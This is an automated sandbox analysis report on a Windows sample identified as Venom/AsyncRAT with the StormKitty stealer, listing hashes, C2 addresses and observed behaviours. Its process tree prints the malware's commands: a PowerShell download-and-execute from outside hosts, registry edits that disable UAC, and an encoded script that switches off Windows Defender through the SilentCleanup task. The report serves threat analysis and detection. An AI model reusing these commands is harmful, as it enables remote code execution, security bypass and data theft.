Analysis
-
max time kernel
93s -
max time network
113s -
platform
windows10-2004_x64 -
resource
win10v2004-20240412-en -
resource tags
arch:x64arch:x86image:win10v2004-20240412-enlocale:en-usos:windows10-2004-x64system -
submitted
17-04-2024 11:10
Behavioral task
behavioral1
Sample
a16509e5f47dfc723e8ac146aef92046a65551452c9692d443dfa64fcc879392.exe
Resource
win10v2004-20240412-en
General
-
Target
a16509e5f47dfc723e8ac146aef92046a65551452c9692d443dfa64fcc879392.exe
-
Size
75KB
-
MD5
2e5d5abda2f010c8c2cceeb6ff027cc3
-
SHA1
43b36f81335b342de747e4761af0474dc16d6399
-
SHA256
a16509e5f47dfc723e8ac146aef92046a65551452c9692d443dfa64fcc879392
-
SHA512
9f58d9cfb31f924bd6072696868e93808a7b5dc21b13df5db979e98b11ae3a20cfd28cf7c79cdf493bf3e7b4386f95c0f6d1d7a8aff408d945fb19392a012c91
-
SSDEEP
1536:fukUsOSeCX/PMRkYKt2OlY6H1bf/iaVbkzkiLVclN:fXU/jAPMRkYv4jH1bfxVbk7BY
Malware Config
Extracted
http://xcu.exgaming.click
Extracted
http://xcu5.exgaming.click
Extracted
asyncrat
Venom RAT + HVNC + Stealer + Grabber v6.0.3
Default
51.254.53.24:4449
hoyqzolrquxmbnzaee
-
delay
1
-
install
false
-
install_folder
%AppData%
Signatures
-
Processes:
powershell.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection powershell.exe -
StormKitty
StormKitty is an open source info stealer written in C#.
-
StormKitty payload 1 IoCs
Processes:
resource yara_rule behavioral1/memory/1444-76-0x000000001D0D0000-0x000000001D1F2000-memory.dmp family_stormkitty -
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process target process PID 4504 created 664 4504 powershell.exe lsass.exe PID 4112 created 664 4112 powershell.exe lsass.exe -
Processes:
a16509e5f47dfc723e8ac146aef92046a65551452c9692d443dfa64fcc879392.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\consentpromptbehavioradmin = "0" a16509e5f47dfc723e8ac146aef92046a65551452c9692d443dfa64fcc879392.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\enablelua = "0" a16509e5f47dfc723e8ac146aef92046a65551452c9692d443dfa64fcc879392.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\promptonsecuredesktop = "0" a16509e5f47dfc723e8ac146aef92046a65551452c9692d443dfa64fcc879392.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
a16509e5f47dfc723e8ac146aef92046a65551452c9692d443dfa64fcc879392.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\Control Panel\International\Geo\Nation a16509e5f47dfc723e8ac146aef92046a65551452c9692d443dfa64fcc879392.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
a16509e5f47dfc723e8ac146aef92046a65551452c9692d443dfa64fcc879392.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\enablelua a16509e5f47dfc723e8ac146aef92046a65551452c9692d443dfa64fcc879392.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\enablelua = "0" a16509e5f47dfc723e8ac146aef92046a65551452c9692d443dfa64fcc879392.exe -
Launches sc.exe 6 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exepid process 3768 sc.exe 4620 sc.exe 1268 sc.exe 436 sc.exe 2956 sc.exe 4684 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exepowershell.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 30 IoCs
Processes:
powershell.exepowershell.exepowershell.exea16509e5f47dfc723e8ac146aef92046a65551452c9692d443dfa64fcc879392.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 5024 powershell.exe 5024 powershell.exe 1972 powershell.exe 1972 powershell.exe 1296 powershell.exe 1444 a16509e5f47dfc723e8ac146aef92046a65551452c9692d443dfa64fcc879392.exe 1444 a16509e5f47dfc723e8ac146aef92046a65551452c9692d443dfa64fcc879392.exe 1296 powershell.exe 2088 powershell.exe 2088 powershell.exe 1444 a16509e5f47dfc723e8ac146aef92046a65551452c9692d443dfa64fcc879392.exe 1444 a16509e5f47dfc723e8ac146aef92046a65551452c9692d443dfa64fcc879392.exe 1444 a16509e5f47dfc723e8ac146aef92046a65551452c9692d443dfa64fcc879392.exe 1444 a16509e5f47dfc723e8ac146aef92046a65551452c9692d443dfa64fcc879392.exe 1444 a16509e5f47dfc723e8ac146aef92046a65551452c9692d443dfa64fcc879392.exe 4504 powershell.exe 1444 a16509e5f47dfc723e8ac146aef92046a65551452c9692d443dfa64fcc879392.exe 4112 powershell.exe 4112 powershell.exe 4504 powershell.exe 4504 powershell.exe 4112 powershell.exe 4504 powershell.exe 4112 powershell.exe 1840 powershell.exe 3764 powershell.exe 1840 powershell.exe 3764 powershell.exe 1840 powershell.exe 3764 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
a16509e5f47dfc723e8ac146aef92046a65551452c9692d443dfa64fcc879392.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exewhoami.exewhoami.exepowershell.exepowershell.exewhoami.exedescription pid process Token: SeDebugPrivilege 1444 a16509e5f47dfc723e8ac146aef92046a65551452c9692d443dfa64fcc879392.exe Token: SeDebugPrivilege 5024 powershell.exe Token: SeDebugPrivilege 1972 powershell.exe Token: SeDebugPrivilege 1296 powershell.exe Token: SeDebugPrivilege 2088 powershell.exe Token: SeDebugPrivilege 4504 powershell.exe Token: SeDebugPrivilege 4112 powershell.exe Token: SeDebugPrivilege 836 whoami.exe Token: SeDebugPrivilege 836 whoami.exe Token: SeDebugPrivilege 836 whoami.exe Token: SeDebugPrivilege 836 whoami.exe Token: SeDebugPrivilege 836 whoami.exe Token: SeDebugPrivilege 836 whoami.exe Token: SeDebugPrivilege 836 whoami.exe Token: SeDebugPrivilege 836 whoami.exe Token: SeDebugPrivilege 836 whoami.exe Token: SeDebugPrivilege 836 whoami.exe Token: SeDebugPrivilege 836 whoami.exe Token: SeDebugPrivilege 836 whoami.exe Token: SeDebugPrivilege 836 whoami.exe Token: SeDebugPrivilege 836 whoami.exe Token: SeDebugPrivilege 836 whoami.exe Token: SeDebugPrivilege 836 whoami.exe Token: SeDebugPrivilege 836 whoami.exe Token: SeDebugPrivilege 836 whoami.exe Token: SeDebugPrivilege 836 whoami.exe Token: SeDebugPrivilege 836 whoami.exe Token: SeDebugPrivilege 836 whoami.exe Token: SeDebugPrivilege 836 whoami.exe Token: SeDebugPrivilege 836 whoami.exe Token: SeDebugPrivilege 836 whoami.exe Token: SeDebugPrivilege 836 whoami.exe Token: SeDebugPrivilege 836 whoami.exe Token: SeDebugPrivilege 620 whoami.exe Token: SeDebugPrivilege 620 whoami.exe Token: SeDebugPrivilege 620 whoami.exe Token: SeDebugPrivilege 620 whoami.exe Token: SeDebugPrivilege 620 whoami.exe Token: SeDebugPrivilege 620 whoami.exe Token: SeDebugPrivilege 620 whoami.exe Token: SeDebugPrivilege 620 whoami.exe Token: SeDebugPrivilege 620 whoami.exe Token: SeDebugPrivilege 620 whoami.exe Token: SeDebugPrivilege 620 whoami.exe Token: SeDebugPrivilege 620 whoami.exe Token: SeDebugPrivilege 620 whoami.exe Token: SeDebugPrivilege 620 whoami.exe Token: SeDebugPrivilege 620 whoami.exe Token: SeDebugPrivilege 620 whoami.exe Token: SeDebugPrivilege 620 whoami.exe Token: SeDebugPrivilege 620 whoami.exe Token: SeDebugPrivilege 620 whoami.exe Token: SeDebugPrivilege 620 whoami.exe Token: SeDebugPrivilege 620 whoami.exe Token: SeDebugPrivilege 620 whoami.exe Token: SeDebugPrivilege 620 whoami.exe Token: SeDebugPrivilege 620 whoami.exe Token: SeDebugPrivilege 620 whoami.exe Token: SeDebugPrivilege 620 whoami.exe Token: SeDebugPrivilege 1840 powershell.exe Token: SeDebugPrivilege 3764 powershell.exe Token: SeDebugPrivilege 884 whoami.exe Token: SeDebugPrivilege 884 whoami.exe Token: SeDebugPrivilege 884 whoami.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
a16509e5f47dfc723e8ac146aef92046a65551452c9692d443dfa64fcc879392.exepid process 1444 a16509e5f47dfc723e8ac146aef92046a65551452c9692d443dfa64fcc879392.exe 1444 a16509e5f47dfc723e8ac146aef92046a65551452c9692d443dfa64fcc879392.exe 1444 a16509e5f47dfc723e8ac146aef92046a65551452c9692d443dfa64fcc879392.exe -
Suspicious use of WriteProcessMemory 58 IoCs
Processes:
a16509e5f47dfc723e8ac146aef92046a65551452c9692d443dfa64fcc879392.execmd.exepowershell.exepowershell.exepowershell.exepowershell.exedescription pid process target process PID 1444 wrote to memory of 2656 1444 a16509e5f47dfc723e8ac146aef92046a65551452c9692d443dfa64fcc879392.exe cmd.exe PID 1444 wrote to memory of 2656 1444 a16509e5f47dfc723e8ac146aef92046a65551452c9692d443dfa64fcc879392.exe cmd.exe PID 2656 wrote to memory of 5024 2656 cmd.exe powershell.exe PID 2656 wrote to memory of 5024 2656 cmd.exe powershell.exe PID 2656 wrote to memory of 1972 2656 cmd.exe powershell.exe PID 2656 wrote to memory of 1972 2656 cmd.exe powershell.exe PID 2656 wrote to memory of 1296 2656 cmd.exe powershell.exe PID 2656 wrote to memory of 1296 2656 cmd.exe powershell.exe PID 2656 wrote to memory of 2088 2656 cmd.exe powershell.exe PID 2656 wrote to memory of 2088 2656 cmd.exe powershell.exe PID 1444 wrote to memory of 4504 1444 a16509e5f47dfc723e8ac146aef92046a65551452c9692d443dfa64fcc879392.exe powershell.exe PID 1444 wrote to memory of 4504 1444 a16509e5f47dfc723e8ac146aef92046a65551452c9692d443dfa64fcc879392.exe powershell.exe PID 1444 wrote to memory of 4112 1444 a16509e5f47dfc723e8ac146aef92046a65551452c9692d443dfa64fcc879392.exe powershell.exe PID 1444 wrote to memory of 4112 1444 a16509e5f47dfc723e8ac146aef92046a65551452c9692d443dfa64fcc879392.exe powershell.exe PID 4112 wrote to memory of 1268 4112 powershell.exe sc.exe PID 4112 wrote to memory of 1268 4112 powershell.exe sc.exe PID 4504 wrote to memory of 4620 4504 powershell.exe sc.exe PID 4504 wrote to memory of 4620 4504 powershell.exe sc.exe PID 4112 wrote to memory of 2968 4112 powershell.exe cmd.exe PID 4112 wrote to memory of 2968 4112 powershell.exe cmd.exe PID 4504 wrote to memory of 4592 4504 powershell.exe cmd.exe PID 4504 wrote to memory of 4592 4504 powershell.exe cmd.exe PID 4112 wrote to memory of 836 4112 powershell.exe whoami.exe PID 4504 wrote to memory of 620 4504 powershell.exe whoami.exe PID 4112 wrote to memory of 836 4112 powershell.exe whoami.exe PID 4504 wrote to memory of 620 4504 powershell.exe whoami.exe PID 4504 wrote to memory of 4392 4504 powershell.exe net1.exe PID 4504 wrote to memory of 4392 4504 powershell.exe net1.exe PID 4112 wrote to memory of 4796 4112 powershell.exe net1.exe PID 4112 wrote to memory of 4796 4112 powershell.exe net1.exe PID 4504 wrote to memory of 2200 4504 powershell.exe net1.exe PID 4504 wrote to memory of 2200 4504 powershell.exe net1.exe PID 4112 wrote to memory of 4584 4112 powershell.exe net1.exe PID 4112 wrote to memory of 4584 4112 powershell.exe net1.exe PID 4504 wrote to memory of 3764 4504 powershell.exe powershell.exe PID 4504 wrote to memory of 3764 4504 powershell.exe powershell.exe PID 4112 wrote to memory of 1840 4112 powershell.exe powershell.exe PID 4112 wrote to memory of 1840 4112 powershell.exe powershell.exe PID 1840 wrote to memory of 4684 1840 powershell.exe sc.exe PID 1840 wrote to memory of 4684 1840 powershell.exe sc.exe PID 3764 wrote to memory of 3768 3764 powershell.exe sc.exe PID 3764 wrote to memory of 3768 3764 powershell.exe sc.exe PID 1840 wrote to memory of 2152 1840 powershell.exe cmd.exe PID 1840 wrote to memory of 2152 1840 powershell.exe cmd.exe PID 3764 wrote to memory of 1280 3764 powershell.exe cmd.exe PID 3764 wrote to memory of 1280 3764 powershell.exe cmd.exe PID 3764 wrote to memory of 884 3764 powershell.exe whoami.exe PID 3764 wrote to memory of 884 3764 powershell.exe whoami.exe PID 1840 wrote to memory of 4484 1840 powershell.exe whoami.exe PID 1840 wrote to memory of 4484 1840 powershell.exe whoami.exe PID 3764 wrote to memory of 2520 3764 powershell.exe net1.exe PID 3764 wrote to memory of 2520 3764 powershell.exe net1.exe PID 1840 wrote to memory of 5008 1840 powershell.exe net1.exe PID 1840 wrote to memory of 5008 1840 powershell.exe net1.exe PID 1840 wrote to memory of 2956 1840 powershell.exe sc.exe PID 1840 wrote to memory of 2956 1840 powershell.exe sc.exe PID 3764 wrote to memory of 436 3764 powershell.exe sc.exe PID 3764 wrote to memory of 436 3764 powershell.exe sc.exe -
System policy modification 1 TTPs 3 IoCs
Processes:
a16509e5f47dfc723e8ac146aef92046a65551452c9692d443dfa64fcc879392.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\consentpromptbehavioradmin = "0" a16509e5f47dfc723e8ac146aef92046a65551452c9692d443dfa64fcc879392.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\enablelua = "0" a16509e5f47dfc723e8ac146aef92046a65551452c9692d443dfa64fcc879392.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\promptonsecuredesktop = "0" a16509e5f47dfc723e8ac146aef92046a65551452c9692d443dfa64fcc879392.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}2⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" qc windefend3⤵
- Launches sc.exe
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"3⤵
-
C:\Windows\system32\whoami.exe"C:\Windows\system32\whoami.exe" /groups3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\net1.exe"C:\Windows\system32\net1.exe" stop windefend3⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" config windefend depend= RpcSs-TOGGLE3⤵
- Launches sc.exe
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}2⤵
- Modifies Windows Defender Real-time Protection settings
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" qc windefend3⤵
- Launches sc.exe
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"3⤵
-
C:\Windows\system32\whoami.exe"C:\Windows\system32\whoami.exe" /groups3⤵
-
C:\Windows\system32\net1.exe"C:\Windows\system32\net1.exe" stop windefend3⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" config windefend depend= RpcSs-TOGGLE3⤵
- Launches sc.exe
-
C:\Users\Admin\AppData\Local\Temp\a16509e5f47dfc723e8ac146aef92046a65551452c9692d443dfa64fcc879392.exe"C:\Users\Admin\AppData\Local\Temp\a16509e5f47dfc723e8ac146aef92046a65551452c9692d443dfa64fcc879392.exe"1⤵
- UAC bypass
- Checks computer location settings
- Checks whether UAC is enabled
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- System policy modification
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe')3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe')3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc @ ( e c h o   o f f % ) [ 1 ]  
 s p   ' H K C U : \ V o l a t i l e   E n v i r o n m e n t '   ' T o g g l e D e f e n d e r '   @ '  
 i f   ( $ ( s c . e x e   q c   w i n d e f e n d )   - l i k e   ' * T O G G L E * ' )   { $ T O G G L E = 7 ; $ K E E P = 6 ; $ A = ' E n a b l e ' ; $ S = ' O F F ' } e l s e { $ T O G G L E = 6 ; $ K E E P = 7 ; $ A = ' D i s a b l e ' ; $ S = ' O N ' }  
  
 i f   ( $ e n v : 1   - n e   6   - a n d   $ e n v : 1   - n e   7 )   {   $ e n v : 1 = $ T O G G L E   }  
  
 s t a r t   c m d   - a r g s   ' / d / r   S e c u r i t y H e a l t h S y s t r a y   &   " % P r o g r a m F i l e s % \ W i n d o w s   D e f e n d e r \ M S A S C u i L . e x e " '   - w i n   1  
  
 $ n o t i f = ' H K C U : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s \ C u r r e n t V e r s i o n \ N o t i f i c a t i o n s \ S e t t i n g s \ W i n d o w s . S y s t e m T o a s t . S e c u r i t y A n d M a i n t e n a n c e '  
 n i   $ n o t i f   - e a   0 | o u t - n u l l ;   r i   $ n o t i f . r e p l a c e ( ' S e t t i n g s ' , ' C u r r e n t ' )   - R e c u r s e   - F o r c e   - e a   0  
 s p   $ n o t i f   E n a b l e d   0   - T y p e   D w o r d   - F o r c e   - e a   0 ;   i f   ( $ T O G G L E   - e q   7 )   { r p   $ n o t i f   E n a b l e d   - F o r c e   - e a   0 }  
  
 $ t s = N e w - O b j e c t   - C o m O b j e c t   ' S c h e d u l e . S e r v i c e ' ;   $ t s . C o n n e c t ( ) ;   $ b a f f l i n g = $ t s . G e t F o l d e r ( ' \ M i c r o s o f t \ W i n d o w s \ D i s k C l e a n u p ' )  
 $ b p a s s = $ b a f f l i n g . G e t T a s k ( ' S i l e n t C l e a n u p ' ) ;   $ f l a w = $ b p a s s . D e f i n i t i o n  
  
 $ u = 0 ; $ w = w h o a m i   / g r o u p s ; i f ( $ w - l i k e ' * 1 - 5 - 3 2 - 5 4 4 * ' ) { $ u = 1 } ; i f ( $ w - l i k e ' * 1 - 1 6 - 1 2 2 8 8 * ' ) { $ u = 2 } ; i f ( $ w - l i k e ' * 1 - 1 6 - 1 6 3 8 4 * ' ) { $ u = 3 }  
  
 $ r = [ c h a r ] 1 3 ;   $ n f o = [ c h a r ] 3 9 + $ r + '   ( \       / ) ' + $ r + ' (   *   .   *   )     A   l i m i t e d   a c c o u n t   p r o t e c t s   y o u   f r o m   U A C   e x p l o i t s ' + $ r + '         ` ` ` ' + $ r + [ c h a r ] 3 9  
 $ s c r i p t = ' - n o p   - w i n   1   - c   &   { r p   h k c u : \ e n v i r o n m e n t   w i n d i r   - e a   0 ; $ A v e Y o = ' + $ n f o + ' ; $ e n v : 1 = ' + $ e n v : 1 ;   $ e n v : _ _ C O M P A T _ L A Y E R = ' I n s t a l l e r '  
 $ s c r i p t + = ' ; i e x ( ( g p   R e g i s t r y : : H K E Y _ U s e r s \ S - 1 - 5 - 2 1 * \ V o l a t i l e *   T o g g l e D e f e n d e r   - e a   0 ) [ 0 ] . T o g g l e D e f e n d e r ) } ' ;   $ c m d = ' p o w e r s h e l l   ' + $ s c r i p t  
  
 i f   ( $ u   - e q   0 )   {  
     s t a r t   p o w e r s h e l l   - a r g s   $ s c r i p t   - v e r b   r u n a s   - w i n   1 ;   b r e a k  
 }  
 i f   ( $ u   - e q   1 )   {  
